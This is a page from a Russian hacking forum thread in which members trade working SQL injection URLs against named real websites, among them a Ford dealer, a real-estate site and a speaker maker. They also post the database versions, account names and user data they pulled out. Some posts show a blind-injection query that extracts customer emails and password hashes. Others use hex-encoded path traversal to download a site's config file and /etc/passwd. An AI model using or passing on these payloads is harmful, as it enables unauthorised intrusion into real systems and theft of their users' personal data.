HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу SQL Инъекции
   
Ответ
Страница 1436 из 1604 « Первая < 436936133613861426 1432 1433 1434 1435 1436 1437 1438 1439 1440 144614861536 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #14351  
Старый 27.10.2011, 14:53
stepashka_
Познавший АНТИЧАТ
Регистрация: 09.11.2009
Сообщений: 1,077
Провел на форуме:
7879791

Репутация: 265


Отправить сообщение для stepashka_ с помощью ICQ
По умолчанию
Цитата:
Сообщение от None  
http://www.placeanad.ru/index.php?id_typ=288+union+select+1,2,3,4,5,6,CONC AT_WS(user(),version(),DATABASE()),8,9,0,1,2,3,4,5 ,6,7,8,9,0,1,2,3,4,5,6,7,8+--+
4 эх
 
Ответить с цитированием

  #14352  
Старый 27.10.2011, 19:49
vaddd
Познающий
Регистрация: 06.01.2009
Сообщений: 69
Провел на форуме:
116125

Репутация: 3
По умолчанию
http://railroad.union.rpi.edu/article.php?article=0%20union%20select%201,2,3,ver sion()
 
Ответить с цитированием

  #14353  
Старый 28.10.2011, 14:05
AC//DC
Познающий
Регистрация: 28.07.2009
Сообщений: 98
Провел на форуме:
247684

Репутация: 136
По умолчанию
сервесный центр FORD

http://www.ford-nnov.ru/index.php?page=42&idm=-3+and+1=2+union+select+1,2,3,concat_ws(0x3a,@@vers ion,user(),database()),5,6,7,8+--

дальнейшие действия блокирует sweb

http://www.ford-nnov.ru/index.php?page=42&idm=-3+and+1=2+union+select+1,2,3,4,5,6,7,8+from+admin--
 
Ответить с цитированием

  #14354  
Старый 29.10.2011, 07:37
BigBear
Новичок
Регистрация: 04.12.2008
Сообщений: 11
Провел на форуме:
69033

Репутация: 8
По умолчанию
Цитата:
Сообщение от AC//DC  
AC//DC said:
http://www.ford-nnov.ru/index.php?page=42&idm=-3+and+1=2+union+select+1,2,3,concat_ws(0x3a,@@vers ion,user(),database()),5,6,7,8+--
дальнейшие действия блокирует sweb
http://www.ford-nnov.ru/index.php?page=42&idm=-3+and+1=2+union+select+1,2,3,4,5,6,7,8+from+admin--
Крутил бы через слепую. Я уже писал, что раскручивание скулей через слепую инъекцию spaceweb не блокирует.

В твоём случае:

Код:
Code:
http://www.ford-nnov.ru/index.php?page=42&idm=-3+or+ascii(substring((select+anket_forms.email+from+fordnnov.anket_forms+order+by+id+limit+0,1),1,1))=97
Там 207 записей вида email:hash

Вот только авторизации я не нашёл
 
Ответить с цитированием

  #14355  
Старый 29.10.2011, 14:27
stepashka_
Познавший АНТИЧАТ
Регистрация: 09.11.2009
Сообщений: 1,077
Провел на форуме:
7879791

Репутация: 265


Отправить сообщение для stepashka_ с помощью ICQ
По умолчанию
http://www.vladdom.ru/index.php?mod=page_show&id_pag=-49+union+select+1,2,3,4,concat_ws(0x3a,version(),u ser(),DATABASE()),6,7,8,9,0,1,2++--+
 
Ответить с цитированием

  #14356  
Старый 29.10.2011, 17:57
Boolean
Guest
Сообщений: n/a
Провел на форуме:
40748

Репутация: 78
По умолчанию
Цитата:
Сообщение от stepashka_  
stepashka_ said:
http://www.vladdom.ru/index.php?mod=page_show&id_pag=-49+union+select+1,2,3,4,concat_ws(0x3a,version(),u ser(),DATABASE()),6,7,8,9,0,1,2++--+
Обратил внимание на ошибку, filesize() /7

Код:
Code:
http://www.vladdom.ru/index.php?mod=page_show&id_pag=-49+union+select+1,2,3,4,concat_ws%280x3a,version%28%29,user%28%29,DATABASE%28%29%29,6,0x2e2e2f2e2e2f436f6e6e656374696f6e732f76646f6d2e706870,8,9,0,1,2++--+
Тыкаем на скачать файл ../../Connections/vdom.php и получаем файл.

/etc/passwd:

Код:
Code:
http://www.vladdom.ru/index.php?mod=page_show&id_pag=-49+union+select+1,2,3,4,concat_ws%280x3a,version%28%29,user%28%29,DATABASE%28%29%29,6,0x2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f6574632f706173737764,8,9,0,1,2++--+
 
Ответить с цитированием

  #14357  
Старый 30.10.2011, 19:15
ta-kyn
Новичок
Регистрация: 07.05.2009
Сообщений: 20
Провел на форуме:
86381

Репутация: 16
По умолчанию
Код:
Code:
http://www.bcspeakers.org/product.php?id=0000000347+UNION+SELECT+1,2,3,4,5,6,CONCAT_WS(USER(),VERSION(),DATABASE()),8,9,10,11,12,13,14,15+--
5.0.77www-bcspeakersro@localhostwww-bcspeakerstest

user:becspeak2803
 
Ответить с цитированием

  #14358  
Старый 30.10.2011, 20:16
Unknown
Guest
Сообщений: n/a
Провел на форуме:
129743

Репутация: 92
По умолчанию
Код:
Code:
http://www.drawminos.com/index.html?id=-218283+union+select+1,2,concat_ws(version(),database(),user()),4,5,6+--+
version: 5.0.77

database: drawminos

user: drawn

тИЦ: 10 / PR: 4
 
Ответить с цитированием

  #14359  
Старый 30.10.2011, 20:51
ta-kyn
Новичок
Регистрация: 07.05.2009
Сообщений: 20
Провел на форуме:
86381

Репутация: 16
По умолчанию
Код:
Code:
http://luellagloverwilson.co.uk/page.php?p=char(49,57,39)+AND+1=2+UNION+SELECT+1,2,CONCAT_WS(USER(),VERSION(),DATABASE())+--
5.0.92-communityxian_lgw@localhostxian_lgw

..очень грустный оказался inject..

2nikp - Прошляпил маленько, CONCAT_WS(['-',USER(),VERSION(),DATABASE())
 
Ответить с цитированием

  #14360  
Старый 30.10.2011, 21:28
aydin-ka
Новичок
Регистрация: 03.05.2009
Сообщений: 7
Провел на форуме:
102906

Репутация: -14
По умолчанию
тиЦ 10 PR 6

Код:
Code:
http://www.dgc.ca/faq2.php?language=0&id=173&faqid=577+union+select+concat_ws%280x3a,user%28%29,database%28%29,version%28%29%29--
NDD@localhost:NDD:5.0.22-Debian_0ubuntu6.06.15-log

P.S: первый раз такое вижу

Запрос + код на странице
 
Ответить с цитированием
Ответ
Страница 1436 из 1604 « Первая < 436936133613861426 1432 1433 1434 1435 1436 1437 1438 1439 1440 144614861536 > Последняя »



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ